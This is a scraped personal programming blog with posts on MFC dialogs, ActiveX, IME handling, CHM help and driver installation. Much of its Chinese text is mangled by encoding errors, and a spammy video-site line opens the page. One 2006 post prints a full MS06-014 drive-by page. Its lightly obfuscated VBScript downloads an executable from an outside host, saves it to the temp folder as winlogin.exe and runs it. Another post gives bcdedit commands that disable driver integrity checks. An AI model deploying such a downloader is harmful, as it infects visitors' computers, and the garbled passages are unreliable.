午夜欧美视频,欧美在线视频免费播放,一区二区在线免费观看

printer driver

brent — Wed, 12 Sep 2012 15:26:00 GMT

C:\PROGRA~2\COMMON~1\FLOORC~1\FEP\PRIMOA~2\PrimoRun.exe

1) disable driver digital signatures
http://answers.microsoft.com/en-us/windows/forum/windows_7-windows_programs/turning-off-digital-signatures/23c67c73-3fa0-4de3-a9b5-3adf4c3472f3

You can disable digitally signed signatures, however it is not recommended.
Important: The driver signing enforcement in Windows 7 and Vista is there for a reason. Unsigned drivers could theoretically contain malicious code and harm your computer.

Step 1: Click Start button on the left bottom corner of desktop. In the search box, type "cmd"

Step 2: Go to Run command, and right click on command prompt and click on "Run as administrator".

Step 3: In the command prompt, type in these commands: Be very careful here. BCDEDIT controls how your computer boots up.

IMPORTANT:make a backup of your bcd file first. To do that, type:
bcdedit /export C:\savedbcd

This will create a file c:\savebcd which is your boot entry backup.
If you mess up, you can always undo changes by:

bcdedit /import c:\savedbcd

Then type these commands:

bcdedit.exe -set loadoptions DDISABLE_INTEGRITY_CHECKS
bcdedit.exe -set TESTSIGNING ON

After you finished the steps above mentioned, you have made digital driver signing signature disabled for all installation. So you can install device drivers on Windows 7 without warning message that those drivers should be digitally signed.

2) install gpedit on window 7 basic
http://www.askvg.com/how-to-enable-group-policy-editor-gpedit-msc-in-windows-7-home-premium-home-basic-and-starter-editions/comment-page-4/#comments

NOTE: For Windows 7 64-bit (x64) users! You'll also need to go to "SysWOW64" folder present in C:\Windows folder and copy "GroupPolicy", "GroupPolicyUsers" folders and gpedit.msc file from there and paste them in "C:\Windows\System32" folder.

http://www.shnenglu.com/Files/aqazero/add_gpedit_msc_by_jwils876-d3kh6vm.zip

3) uninstall AOL
http://answers.yahoo.com/question/index?qid=20061224095808AAMxsCT
AOL ANTIVIRUS AOL SPYWARE PROTECTION AOL FIREWALL AOL SAFETY AND SECURITY CENTER

http://forums.techguy.org/digital-photography-imaging/536280-alternate-solution-printer-driver-unknown.html

brent 2012-09-12 23:26 发表评论

simulate OnIdle in MFC ActiveX control

brent — Thu, 15 Apr 2010 07:49:00 GMT

There are two ways to do this, one is simple, another is complicated but more powerful.

Method A:

::SetWindowsHookEx(WH_FOREGROUNDIDLE, YourIdleProc, AfxGetInstanceHandle(), GetCurrentThreadId());

Method B (my way):

1 static HHOOK s_hGetMsgHook = NULL;
2
3 LRESULT FAR PASCAL GetMsgProc(int nCode, WPARAM wParam, LPARAM lParam)
4 {
5     AFX_MANAGE_STATE(AfxGetStaticModuleState( ));
6
7     LPMSG lpMsg = (LPMSG) lParam;
8     if( (nCode >= 0) && PM_REMOVE == wParam)
9     {
10         //your code here. maybe to deal with hot-keys, accelerators ...
11         //see http://support.microsoft.com/kb/187988
12
13         //my code to simulate OnIdle
14         static BOOL bIdle = FALSE;
15         CWinApp* pApp = AfxGetApp();
16         if(!bIdle && pApp->IsIdleMessage(lpMsg))
17             bIdle = TRUE;
18
19         if(bIdle)
20         {
21             MSG msgPeek = {0};
22             if(!::PeekMessage(&msgPeek, NULL, NULL, NULL, PM_NOREMOVE))
23             {
24                 VERIFY(PostMessage(AfxGetMainWnd()->GetSafeHwnd(), WM_USER+0x12, 0x34, 0x56));
25             }
26         }
27
28         if(lpMsg->hwnd == AfxGetMainWnd()->GetSafeHwnd() &&
29             lpMsg->message == WM_USER+0x12 && lpMsg->wParam == 0x34 && lpMsg->lParam == 0x56)
30         {
31             lpMsg->message = WM_NULL;
32             lpMsg->lParam = 0L;
33             lpMsg->wParam = 0L;
34
35             pApp->OnIdle(0);
36             bIdle = FALSE;
37         }
38     }
39
40     return ::CallNextHookEx(s_hGetMsgHook, nCode, wParam, lParam);
41 }
42
43 int CYourOleControl::OnCreate(LPCREATESTRUCT lpCreateStruct)
44 {
45     //...
46
47     if(NULL == s_hGetMsgHook)
48         s_hGetMsgHook = ::SetWindowsHookEx(WH_GETMESSAGE, GetMsgProc, AfxGetInstanceHandle(), GetCurrentThreadId());
49 }
50
51 void CYourOleControl::OnDestroy()
52 {
53     //...
54
55     ::UnhookWindowsHookEx(s_hGetMsgHook);
56     s_hGetMsgHook = NULL;
57
58     COleControl::OnDestroy();
59 }

Method A is far more simple, but with Method B:

1) You can override CWinApp::IsIdleMessage to filter some special messages, such as a frequent timer which will not affect what you want to do in CWinApp::OnIdle. Because timer will affect message queue and if you don't filter it, OnIdle will be called every time after the timer is invoked.

2) Sometimes your action in OnIdle will affect message queue inevitably, thus you will get a infinite loop: OnIdle->the special messages in message queue->OnIdle->... But with Method B, with SPY++ you can find the special messages, and filter them in IsIdleMessage.

brent 2010-04-15 15:49 发表评论

vista windows 7 areo progress bar

brent — Fri, 06 Nov 2009 03:56:00 GMT

vista windows 7 areo progress bar 比较恶心�Q?它会自己画进度，以前的正常的代码到vista/window7上以后， �q�度条就��M��?00%了�?br>
http://stackoverflow.com/questions/313792/disabling-progress-bar-animation-on-vista-aero
http://msdn.microsoft.com/en-us/library/aa511486.aspx

�?meters"? 没空啊�?br>
我的暴力�Ҏ(gu��)��是：

g_xpStyle.SetWindowTheme(m_hProgressWnd, L"",L"");

g_xpStyle ��是那个 CVisualStylesXP�Q?google 一下就有了�?br>

brent 2009-11-06 11:56 发表评论

恨不盔R��未嫁时

brent — Thu, 29 Oct 2009 03:56:00 GMT

http://www.codeguru.com/cpp/controls/toolbar/customizingtoolbars/article.php/c2511/
bcgcontrolbar

��Z��间最痛苦的事莫过于此�?br>

brent 2009-10-29 11:56 发表评论

create mfc dialog by template will drive you mad.

brent — Wed, 19 Nov 2008 07:10:00 GMT

I have a dialog template in resource, and i have a dialog class, called CMyDialog.

And now, sometimes , i need CMyDialog to be a model dialog (WS_POPUP), sometimes be a child of another dialog(WS_CHILD).

How to make this done without duplicating the template in resource?

Call ModifyStyle after creation? Failed
Modify the LPCREATESTRUCT's style in CMyDialog::OnCreate ? Failed.
Override PreCreateWindow? Failed.

After a lot of tracing and a lot of googling. I worked out something like this:

BOOL CMyDialog::CreateAsChild(CWnd * pParent)
{
    if(!IsWindow(pParent->GetSafeHwnd()))
        return FALSE;

    m_lpszTemplateName = ATL_MAKEINTRESOURCE(IDD_WALLLAYER_PROPERTYPAGE);  // used for help
    if (m_nIDHelp == 0)
        m_nIDHelp = LOWORD((DWORD_PTR)m_lpszTemplateName);

    HINSTANCE hInst = AfxFindResourceHandle(m_lpszTemplateName, RT_DIALOG);
    HRSRC hResource = ::FindResource(hInst, m_lpszTemplateName, RT_DIALOG);
    HGLOBAL hTemplate = LoadResource(hInst, hResource);
    LPCDLGTEMPLATE lpDialogTemplate = (LPCDLGTEMPLATE)LockResource(hTemplate);
    DLGTEMPLATEEX* lpDlgTmpEx = (DLGTEMPLATEEX* )lpDialogTemplate;
    DWORD dwOldStyle = 0;
    BOOL bIsDlgEx = lpDlgTmpEx->signature == 0xFFFF;
    if(bIsDlgEx)
    {
        dwOldStyle = lpDlgTmpEx->style;
        lpDlgTmpEx->style = DS_SETFONT | WS_CHILD;
    }
    else
    {
        dwOldStyle = ((LPDLGTEMPLATE)lpDialogTemplate)->style;
        ((LPDLGTEMPLATE)lpDialogTemplate)->style = DS_SETFONT | WS_CHILD;
    }
    m_lpDialogInit = NULL;
    BOOL bResult = CreateDlgIndirect(lpDialogTemplate, pParent, hInst);
    if(bIsDlgEx)
        lpDlgTmpEx->style = dwOldStyle;
    else
        ((LPDLGTEMPLATE)lpDialogTemplate)->style = dwOldStyle;
    UnlockResource(hTemplate);
    FreeResource(hTemplate);
    return bResult;
}

If you need your dialog to behavior as WS_POPUP or WS_CHILD without duplicating your dialog template, you just get an ugly answer. And anyone who know another better way, let me know please.

MFC

brent 2008-11-19 15:10 发表评论

trap in CreateCompatibleBitmap and memory dc

brent — Mon, 14 Jul 2008 09:15:00 GMT

        CDC dcMem;
        VERIFY(dcMem.CreateCompatibleDC(NULL));
        CBitmap bmp;
        VERIFY(bmp.CreateCompatibleBitmap(&dc,100,100));
        CBitmap * pOld = dcMem.SelectObject(&bmp);
        dcMem.FillSolidRect(0,0,100,100,RGB(255,0,0));
        dcMem.MoveTo(0,0);
        dcMem.LineTo(100,100);
        dc.BitBlt(0,0,100,100,&dcMem,0,0,SRCCOPY);
        dcMem.SelectObject(pOld);

these codes will run smoothly. but you will get nothing other a bitmap either black or white.

See what MSDN says:

CBitmap::CreateCompatibleBitmap

If pDC is a memory device context, the bitmap returned has the same format as the currently selected bitmap in that device context.

When a memory device context is created, GDI automatically selects a monochrome stock bitmap for it.

Solution:
1) pass in a CPaintDC instead of a memory dc
2) just replace VERIFY(bmp.CreateCompatibleBitmap(&dc,100,100)); with bmp.CreateBitmap(100,100,1,32,NULL);

brent 2008-07-14 17:15 发表评论

ie helper, great!

brent — Thu, 13 Mar 2008 07:29:00 GMT

http://www.codeguru.com/cpp/i-n/internet/browsercontrol/article.php/c6175/

brent 2008-03-13 15:29 发表评论

digitizers

brent — Mon, 18 Feb 2008 07:22:00 GMT

http://www.sonycsl.co.jp/projects/ar/restricted/wintabl.html

for python:
http://cgkit.sourceforge.net/doc2/module-cgkit.wintab.html

http://www.gtcocalcomp.com/developers.php

brent 2008-02-18 15:22 发表评论

disk id and WMI C#

brent — Fri, 25 Jan 2008 09:27:00 GMT

http://www.winsim.com/diskid32/diskid32.html
http://msdn2.microsoft.com/en-us/library/aa394554(VS.85).aspx

http://www.csharphelp.com/archives2/archive334.html

http://www.eggheadcafe.com/articles/20030511.asp

brent 2008-01-25 17:27 发表评论

brent — Thu, 29 Nov 2007 10:12:00 GMT

http://www.microsoft.com/china/MSDN/library/Mobility/pocketpc/NETCompactFramework.mspx?mfr=true

scroll bar in .netCFW
http://www.c-sharpcorner.com/UploadFile/mgold/PocketPackingList11082006213122PM/PocketPackingList.aspx

brent 2007-11-29 18:12 发表评论

note Algorithm book, sql server download, .net context help, activex hotkey/ accelerator

brent — Fri, 14 Sep 2007 08:13:00 GMT

crystal lattice 晶格

a great book about Algorithm http://www2.toki.or.id/book/AlgDesignManual/INDEX.HTM

sql server developer
http://beta.verycd.com/groups/@g19046/135284.topic
http://beta.verycd.com/groups/@g19046/64613.topic

A great idea about context help:
1)http://www.codeproject.com/csharp/ContextHelpMadeEasy.asp
2)http://netpl.blogspot.com/2007/07/context-help-made-easy-revisited.html

How to deal with hotkey / accelerator keys in activex
http://support.microsoft.com/?scid=kb;EN-US;Q187988

You know how to google ,you know almost every thing.

brent 2007-09-14 16:13 发表评论

Excel addin处理学生成�W

brent — Tue, 28 Nov 2006 06:40:00 GMT

老婆是班��M�Q�Q�每�ơ考试都要�l�学生发工资�?...一��L(f��ng)��成�W条�?br>每次都要重复一些excel插入�Q�复�Ӟ��_�脓(chu��ng)的操作，于是自作聪明地让我帮她写�E�序�?br>��Z��q�么点小事，让我用vc++写程�?我对VBA不熟�?..)�Q�实在是大材��用啊�?br>而且�E�序写好后还问题多多�Q�bug多多�Q�嗯�Q��?zh��n)��凑合着用吧�?br>有问题就在这里留个言�Q�程序已�l�有更新功能了，我修改�v来你更新��h��都会很方便的(但愿如此�?�?br>
for user:
安装�E�序�?http://www.shnenglu.com/Files/aqazero/brentExcelAddinSetup_fm.zip
excel文�g格式参�?http://www.shnenglu.com/Files/aqazero/example_brentAddin.zip

很烂的源码：http://www.shnenglu.com/Files/aqazero/BrentAddin.rar

brent 2006-11-28 14:40 发表评论

一�D�|��入木马的html代码

brent — Mon, 25 Sep 2006 06:18:00 GMT

< html >
< script language ="VBScript" >
     on error resume next
     ' 卛_��下蝲的木�?/span>
    dl = " ht#tp://ww#w.800vv.com/cc/cj.exe# "
     ' 创徏OBJECT元素
     Set df = document.createElement( " object " )
     ' 指定OBJECT为RDS.DataSpace
         ' 该对象有一个方法名为CreateObject�Q?/span>
         ' helpstring("Creates a business object of the specified Progid over the specified connection")
    df.setAttribute " classid " , " clsid:BD96C556-65A3-11D#0-983A-00C04F#C29E36 "
     '
    str = " Microsoft.XMLHTTP "
     ' RDS.DataSpace.CreateObject("Microsoft.XMLHTTP","")
     Set x = df.CreateObject(str, "" )
     ' 4545
    a1 = " A#do "
    a2 = " db. "
    a3 = " Str "
    a4 = " eam "
     ' str5 = "Adodb.Stream" 分成�q�么多段是�ؓ了掩��目
    str1 = a1 & a2 & a3 & a4
    str5 = str1
     ' RDS.DataSpace.CreateObject("Ado#db.Str#eam","")
     set S = df.createobject(str5, "" )
     ' 5455
    S.type = 1
    str6 = " GET "
     ' Microsoft.XMLHTTP.Open "GET" "ht#tp://ww#w.800vv.com/cc/cj.exe#" False
         ' 下蝲木马
    x.Open str6, dl, False
    x.Send
     ' 本地文�g�?/span>
    fname1 = " winlogin.exe "
     ' 888
     set F = df.createobject( " Scri#pting.FileSy#stemObject " , "" )
     ' 获取临时目录
     set tmp = F.GetSpecialFolder( 2 )
     ' 创徏本地文�g
    fname1 = F.BuildPath(tmp,fname1)
     ' Adodb.Stream.open
    S.open
     ' Adodb.Stream.write 木马代码
    S.write x.responseBody
     ' Adodb.Stream.savetofile "临时目录\winlogin.exe"
    S.savetofile fname1, 2
     ' 6551
    S.close
     ' 458
     set Q = df.createobject( " Shell.Application " , "" )
     ' �q�行临时目录\winlogin.exe
    Q.ShellExecute fname1, "" , ""
     ' 55
     script >
     < head >
     < title > icexiaoyeMS06-014免杀�|�马 title >
     head >< body >
     < center > icexiaoyeMS06-014免杀�|�马 center >
     body >

< script type ="text/jscript" >
function init() {
document.write(Date());

}
window.onload = init;
script >
html >

一般来��_��script是无法写本地文�g的。。这�D�代码利用了Microsoft Data Access Components (MDAC)的一个安全漏�z�来写本地文件�?img src ="http://www.shnenglu.com/aqazero/aggbug/12944.html" width = "1" height = "1" />

brent 2006-09-25 14:18 发表评论

brent — Thu, 13 Jul 2006 09:28:00 GMT

转蝲�?a >http://www.citom.com/论坛http://www.citom.com/forum/forum_posts.asp?TID=301&PN=1&TPN=1

��Z��对MS Office 2003界面研究的兴��，最�q�收集了如何提取Office 2003工具栏图标的相关链接�q�略加翻译整理，�怿��Ҏ(gu��)��感兴��的不止我一个，�Ҏ(gu��)��׃�n�?

1.��Z��Q?/h1>
界面标准化的最好办法就是与MS保持一��_��而Office2003图标非常漂亮�q�且很完�?
现有资源提取工具无法从Office2003相关文�g中提取工��h��图标
手工截屏工作量大、尺�怸�准确、无法完整保�?2位色�Q?位Alpha通道)

2.条�g

已安装Offfice 2003
下蝲提取软�g
昄��模式讄��?2位，切记�Q?/font>

3.步骤

�q�行 SaveAlphaIcons.xla
如果提示宏被��用�Q�进入Excel菜单-〉工�?〉宏-〉安全性，把安全��别设��Z��再次�q�行�q�确认启用宏�?
按Alt+F11�q�入"Visual Basic�~�辑�?,然后按F5�q�行宏即可，�q�行完成后请到“我的文�?下查�?Office 11.0 Alpha Icons"目录�Q�该目录下应该有2488�?BMP文�g�Q�一个文件对应一个图标，每个图标都是16*16大小32位（包括8位Alpha通道),大尺寸图标是通过软�g�~�放完成的，Office本��n没有单独的大图标�?
图标合�ƈ。把alphahlp.exe和CombineBMPs.vbs拯��?Office 11.0 Alpha Icons"目录�Q��l�运�?CombineBMPs.vbs�Q�将会把之前生成的所有小囄��合成一个大囄��(需要较长时�?�Q��ƈ�?bmp,tif,tga,png�{�几�U�格式可供选择�Q�几个文件分别是�Q�Office2003icons.bmp�Q�Office2003icons.png�Q�Office2003icons.tga�Q�Office2003icons.tif�Q�Office2003icons-24bit.png�Q�Office2003icons-alpha.png�Q�其中Office2003icons-alpha.png是仅包含Alpha通道的灰度图像，它与Office2003icons-24bit.png一��h��由O(ji��n)ffice2003icons.png分解而来的，大家可根据具体情况选用�?

4.问题

怎样查找需要的图标?
�׃��图标数目非常之大、�ƈ且尺寸很��，使用资源��理器的�~�略囑֒��qȝ��片等方式查看都不合适，而合�q�后的大图每排有50个，共有50排，看�v来也是眼��q݋乱。因此，要从中挑选合适的图标需要一定的技巧。我的经验是首先通过使用Office2003对大概有哪些图标有个整体了解�Q�其�ơ是使用大图对图标的分布有个大致了解�Q�相关的图标通常在一��P��Q�然后可使用ACDSEE的羃略图查看�Q�ACDSEE默认的羃略图��寸也不适合查看��图�?可在"工具-〉选项-〉文件列�?〉羃略图昄��"中设�|�羃略图大小�?0*30 (ACDSEE6.0版本�Q��?
所有图标都在这里了�?
��我所知，所有图标都在这里了。但有时仍然会出现找不到在Office2003界面中见�q�的图标�Q�这旉��要耐心同时要注意有的图标（如左寚w��Q�本�w�就是黑色的�Q�在查看时会发现很多全黑色的图标�Q�其中可能就有你要的图标。对�q�类图标可在Photoshop中打开�Q�在通道面板中把Alpha通道昄��选中卛_��看清图标原貌�?

5.注意

虽然我们热切期望�q�且微��Y也应该把�q�些图标作�ؓ开发包的一部分免费发布�Q�这样以利于Windows应用的界面风格统一。但是，目前微��Y�q�未许可免费使用�?/p>

Unless Microsoft releases those the icons are copyrighted. So you'd better get a permission to use those before you do. See http://www.microsoft.com/permission/copyrgt/cop-img.htm, it says the following:

Icons
Microsoft does not generally allow the use of our icons in advertising, in books and other printed matter, on clothing or other promotional items, on-line and internet locations, in software applications, in television programs, commercials, movies, or on video tape, as they are NOT to be used as "artwork" or design elements.

EXCEPTIONS: Use of our icons is permissible in relation to a training manual or documentation written for and/or about a Microsoft product. In such cases, use of Microsoft icons must be specific to the function of the icon within the Microsoft software, and not used as a graphical element or design for your own purposes. Further, icons cannot be modified or altered and must appear as they would within the Microsoft software.

6.相关链接

�|�博士论�?http://www.citom.com/forum

http://www.neowin.net/forum/index.php?showtopic=159107&hl=toolbar

http://www.winmatrix.com/forums/index.php?showtopic=1008&st=0

brent 2006-07-13 17:28 发表评论

Activex和ie ��览器的互动

brent — Fri, 30 Dec 2005 09:51:00 GMT

今天中午看到一个电(sh��)子签名的软�g。一看，惊艳�Q?br />activex控�g直接��d��html元素的��|��比如

实在是牛啊！��Z��开始以为是用javascript来做�?查看了例子的源代码后发现不是.

那么�q�个acitvex控�g臛_��应该可以获得ie ��览器的接口IWebBrowser2,但它是怎么做的�?

一开始我的思�\�?ie��览器作��Z��个容�?它是否同时实��C��IOleContainer和IWebBrowser2?试验发现不对...�l�过多方google,扑ֈ�CSDN中shanhe的专�?a >http://blog.csdn.net/shanhe/category/15859.aspx?PageNumber=2
扑ֈ�可行的代码如�?

IOleContainer* pContainer;
HRESULT hr = m_pClientSite->GetContainer(&pContainer);
if (FAILED(hr))
return hr;

IServiceProvider* pServiceProvider;
hr = pContainer->QueryInterface(IID_IServiceProvider,
(void**)&pServiceProvider);
pContainer->Release();
if (FAILED(hr))
return hr;

IWebBrowser2* pWebBrowser;
hr = pServiceProvider->QueryService(SID_SWebBrowserApp,
                           IID_IWebBrowser2,
                           (void**)&pWebBrowser);
pServiceProvider->Release();
if (FAILED(hr))
    return hr;

可以获取了IWebBrowser2接口,但如何读取html元素的值呢?IWebBrowser2接口��g��没有�q�个功能?

又是千山万水的google:
vckbase:
http://vckbase.net/document/viewdoc/?id=1446
codeguru:
http://www.codeguru.com/Cpp/COM-Tech/atl/misc/article.php/c3619/

msdn 2003 :
MSHTML ReferenceHOWTO: Get the WebBrowser Object Model of an HTML Frame
HOWTO: Retrieve the URL of a Web Page from an ActiveX Control

msdn关于MSHTML的参考也够烂�Q�列��Z��堆接口方法就不管了。究竟结构如何要自己�ȝ��I�。��M��很是不爽�?/p>

brent 2005-12-30 17:51 发表评论

brent — Mon, 19 Dec 2005 07:10:00 GMT

关于光标的一些函�?br />BOOL CreateCaret(HWND hWnd,HBITMAP hBitmap,int nWidth,int nHeight);为窗口创建光�?br />BOOL DestroyCaret();销毁光�?br />UINT GetCaretBlinkTime();光标闪烁间隔旉��
BOOL GetCaretPos(LPPOINT lpPoint);光标在当前窗口的client位置
BOOL HideCaret(HWND hWnd);隐藏
BOOL SetCaretBlinkTime(UINT uMSeconds);光标闪烁间隔旉��
BOOL SetCaretPos(int X,int Y);位置
BOOL ShowCaret(HWND hWnd);昄��

CWnd::CreateCaret
CWnd::CreateSolidCaret
CWnd::CreateGrayCaret
CWnd::GetCaretPos
CWnd::SetCaretPos
CWnd::HideCaret
CWnd::ShowCaret

为其它进�E�模拟输入字�W�：
摘自http://www.pcbookcn.com/article/1113.htm
　　首先要知道在Windows�pȝ��中与键盘按键相关的消息有�Q�WM_KEYDOWN、WM_KEYUP�?WM_SYSKEYDOWN、WM_SYSKEYUP、WM_CHAR�{�。其中，W(xu��)M_KEYDOWN为键按下�Q�W(xu��)M_KEYUP为键弹�v�Q�W(xu��)M_SYSKEYDOWN为系�l�键按下�Q�W(xu��)M_SYSKEYUP为系�l�键弹�v�Q�W(xu��)M_CHAR为按键对应的字符�?br />　　要模拟键盘��生键盘消息，我们��发送一条键盘消息给指定�H�口。比如要模拟一个字母键“A”，可以�q�样:PostMessage(hWnd, WM_CHAR, 'A', 0); 模拟按一个回车：PostMessage(hWnd, WM_KEYDOWN, VK_RETURN, 0)。这里的关键问题是要��定�H�口句柄�Q�hWnd�Q�，使用GetFocus()函数可以得到键盘光标所在窗口句柄，但该函数只能得到当前�q�程内的�H�口句柄�?br />　　如果要得到其他应用程序的键盘光标所在窗口句柄，需要调�?AttachThreadInput()函数。该函数的作用就是将其他�H�口�U�程的输入附加到本窗口线�E�的输入操作中，�q�样��可以调用GetFocus()函数得到其他�H�口的句柄了�?br />
AttachThreadInput()函数的原形如�?

BOOL AttachThreadInput(
DWORD idAttach, // 需要附加的�U�程ID
DWORD idAttachTo, // 附加到的�U�程ID
BOOL fAttach // true 附加 false 取消
);

函数使用的过�E�大致如�?

HWND hWnd;
hWnd = GetForegroundWindow(); // 得到当前�H�口
if (hWnd == Form1->Handle) return; // 排除�E�序本��n的窗口�?/span>
DWORD FormThreadID = GetCurrentThreadId(); // 本程序的�U�程ID
// 当前�H�口的线�E�ID
DWORD CWndThreadID = GetWindowThreadProcessId(hWnd, NULL);
// 附加输入�U�程
AttachThreadInput(CWndThreadID, FormThreadID, true);
// 得到当前键盘光标所在的�H�口
hWnd = GetFocus();
// 取消附加的输入线�E��?/span>
AttachThreadInput(CWndThreadID, FormThreadID, false);

hWnd��是当前键盘光标所在的�H�口句柄。另外，�l�过��试发现�Q�在Windows2000�pȝ��下发送字�W�消息（WM_CHAR�Q�时�Q�如果字�W�是一个汉字，则该字符对应的虚拟键盘码高位不�ؓ0�Q�这样得到的字符��׃��正确。解军_��法是做一个“与”运��? ch & 0xFF��可以了�?

输入法的切换:
WM_INPUTLANGCHANGE
platform sdk=>User Interface Servic=>windowing=>windows=>window reference =>Messages

关于输入�?
platform sdk=>Windows Base Services=>International Features=>Input Method Editor

自己处理键盘输入要做的事�Q?br />如果你要自己处理键盘和输入法的输入而不用Eidt或richedit�{�控件的话，臛_��需要做以下处理以下消息WM_IME_STARTCOMPOSITION;WM_IME_ENDCOMPOSITION;WM_IME_COMPOSITION;

LRESULT CCaretStudyView::OnImeStartComposition(WPARAM wParam, LPARAM lParam)
{
    HIMC hIMC = ::ImmGetContext(m_hWnd);
    COMPOSITIONFORM CompForm;
    CompForm.dwStyle = CFS_POINT;
    CompForm.ptCurrentPos.x = 10;//用实际的��g��?/span>
    CompForm.ptCurrentPos.y = 10;//用实际的��g��?/span>
    ::ImmSetCompositionWindow(hIMC, &CompForm);
    //DropCaret();可在此处隐藏光标�Q�在OnImeEndComposition消息处理中再昄��光标
    ::ImmReleaseContext(m_hWnd, hIMC);
    return ::DefWindowProc(m_hWnd, WM_IME_STARTCOMPOSITION, wParam, lParam);
}

LRESULT CCaretStudyView::OnImeEndComposition() {
    //ShowCaretAtCurrentPosition();
    return Default();
}

LRESULT CCaretStudyView::OnImeComposition(WPARAM wParam, LPARAM lParam)
{
    if (lParam & GCS_RESULTSTR) {
        //get result text
        HIMC hIMC = ::ImmGetContext(m_hWnd);
        if (hIMC) {
            const int maxLenInputIME = 200;
            wchar_t wcs[maxLenInputIME];
            LONG bytes = ::ImmGetCompositionStringW(hIMC,
                    GCS_RESULTSTR, wcs, (maxLenInputIME-1)*2);
            //
            // Set new position after converted
            CPoint pos = GetCurrentPos();
            COMPOSITIONFORM CompForm;
            CompForm.dwStyle = CFS_POINT;
            CompForm.ptCurrentPos.x = pos.x;
            CompForm.ptCurrentPos.y = pos.y;
            ::ImmSetCompositionWindow(hIMC, &CompForm);
            ::ImmReleaseContext(m_hWnd, hIMC);
        }
        return 0;
    }
    return Default();
}

以上三个消息是不做处理也可以�Q�只不过不会支持如微软拼韌��入法的跟随功能�?br />
�q�WM_IME_CHAR和W(xu��)M_CHAR��d��字符。在WM_KEYDOWN中处理特�D�字�W�，如VK_BACK VK_DELTE

brent 2005-12-19 15:10 发表评论

VC�E�序使用chm帮助文�g

brent — Mon, 19 Dec 2005 01:30:00 GMT

最�q�在做一个安装程序。想要弄一个上下文相关帮助�?br /> 一开始想用vc6自带的上下文相关帮助。在建立工程的时候选择context-sensitive help卛_��。嗯�Q�vc帮我创徏了AfxDlg.rtf、setup.cnt、setup.hm、setup.hpj、setup.ph�{�文�Ӟ��以�ؓ省事了，用word打开AfxDlg.rtf一看，完全不会�~�辑。看了《inside visual c++》里面的文章�Q�还是一头雾水�?br /> winhelp�q�老掉牙的东西�Q�在win98�q�代��p��htmlhelp淘汰了，��用它�q�嘛�Q�决定弃暗投明，使用html help workshop来做帮助。html help workshop是一�Ƒֈ�作chm文�g的工��P��微��Y免费提供�Q�到处有的下。��用�v来也方便�Q�比�~�辑rtf格式要方便多得多�Q�基本方法是把制作好的网��往里面塞，不浪费口舌了�?

    用html help workshop制作chm是方便，关键是怎么让它可以"上下文相�?。程序里调用chm帮组文�g的api�?br />    HWND HtmlHelp(HWND hwndCaller, LPCSTR pszFile, UINT uCommand, DWORD dwData);
    更改App�cȝ��WinHelp()�Ҏ(gu��)��如下�Q?br /> void CSetupApp::WinHelp(DWORD dwData, UINT nCmd)
{
::HtmlHelp(NULL, "E:\\workshop\\setup\\hlp\\chmtest.chm", HH_HELP_CONTEXT, dwData);
}
    具体文�g在哪需要具体分析。这里要说的是这个dwData可是很有来头的，设个断点��可以看个清楚了�Q?br /> ID_HELP命��o的消息�\径是�Q?br /> CWnd::OnWndMsg()
CDialog::OnCommandHelp()

LRESULT CDialog::OnCommandHelp(WPARAM, LPARAM lParam)
{
if (lParam == 0 && m_nIDHelp != 0)
   lParam = HID_BASE_RESOURCE + m_nIDHelp;//m_nIDHelp��是你的对话框的id�?br /> if (lParam != 0)
{
   CWinApp* pApp = AfxGetApp();
   if (pApp != NULL)
    pApp->WinHelp(lParam);//

return TRUE;
}
return FALSE;
}

如何写CHM:
现在要做的就是把dwData和想要显�C�的东西兌��h��?/div>

具体�Ҏ(gu��)��是：
1、��用记事本建立一个文本文�Ӟ��文�g名�ؓMap.h。在该文件中输入下面的内容：
#define TOPIC1 100
#define TOPIC2 200
�q�里TOPIC1、TOPIC2是一些常量，100�?00是你在API调用时指定的ContextID�?
2、在HTMLHelp Workshop中选择Project标签�Q�点击HtmlHelp API information按钮�Q�在对话框的Map标签中选择Header File按钮�Q�然后选择你前面徏立的Map.h文�g�?
3、还是在HtmlHelp API information对话框中选择Alias标签�Q�点击Add按钮�Q�在对话框中的Whenever This Constant or number is passed to the HTMLHelp API下输入常量，如TOPIC1�?
4、在Use it to Refer to This HTML File中选择HTML文�g�Q�如Topic1.html�?
5、重�?�?两步指定所有文件�?
6、编译文件就可以了�?
�Q��{�?a >http://www.china-askpro.com/msg44/qa78.shtml�Q?br /> 具体的ContextID不是100�Q?00啊，是HID_BASE_RESOURCE+对话框ID�?br /> 查找一下发玎ͼ�#define HID_BASE_RESOURCE 0x00020000UL �Q�如果你的对话框ID值是0x0102那就�?br /> #define MYDLGID 0x20102了�?/div>

注：// Help ID bases�Q�afxpriv.h�Q?br />#define HID_BASE_COMMAND    0x00010000UL        // ID and IDM
#define HID_BASE_RESOURCE   0x00020000UL        // IDR and IDD
#define HID_BASE_PROMPT     0x00030000UL        // IDP
#define HID_BASE_NCAREAS    0x00040000UL
#define HID_BASE_CONTROL    0x00050000UL        // IDC
#define HID_BASE_DISPATCH   0x00060000UL        // IDispatch help codes

如何调用HtmlHelp:
微��Y在提供html help workshop的时候提供了调用�Ҏ(gu��)��Q�就是在html help workshop的安装目录下提供了个头文件和静态库�Q�这个库的作用是装蝲hhctrl.ocx(system32目录�?�Q�调用其中真正的htmlhelp�Ҏ(gu��)��。具体见�Q?br /> http://www.yesky.com/SoftChannel/72342376173010944/20010409/165483.shtml

brent 2005-12-19 09:30 发表评论

brent — Mon, 19 Dec 2005 01:26:00 GMT

昨天lp的机器坏掉，叫我�q�去修。修好后看到她电(sh��)脑上有个3721�Q�我本�h一向觉�?721�q�东西没用，��帮她卸载了�Q�她�?sh��)脑�?28M内存�Q�何必�ؓ没有用的东西��费内存和CPU呢�?/div>

本来�q�好好的�Q�没什么事。可俺就有个坏习惯，查看了一下C:\winnt\downlo~1\目录下的文�g。这个文件夹在Explorer下是隐藏的，只能在命令行模式下看。一看了不得啊，一堆垃圾，看都不看什么的�Q�直�?del /q *.*。提�C�CnsHook.dll CnsMin.dll正在被��用，无法删除。打开��d��理器，看到一个rundll32.exe的进�E�。俺�W�一反应是中病毒了。虽然本人是菜鸟�Q�但一向是疾恶如仇的�?/div>

我想可能是这病毒开了两个进�E�互相监视，所以文件删除不掉。于是�ɞ��浑�w�解术，修改注册表，重命名文�Ӟ��删除文�g�Q�启动后�q�入安全模式。失败、失败！而且��x��个启动盘居然没��Y驱。更可恨的，Norton居然对这个特大号病毒视而不见！

��d��没辙�Q�上�|�google了一下CnsHook.dll�Q�找��C��处，高手清除病毒的过�E?/font>。深受教�Ԍ��原来此病毒就是大名鼎鼎的3721啊，我立马被恶心得想吐，�Ҏ(gu��)��公司的超�U�无��L��了更深刻的认识�?/div>

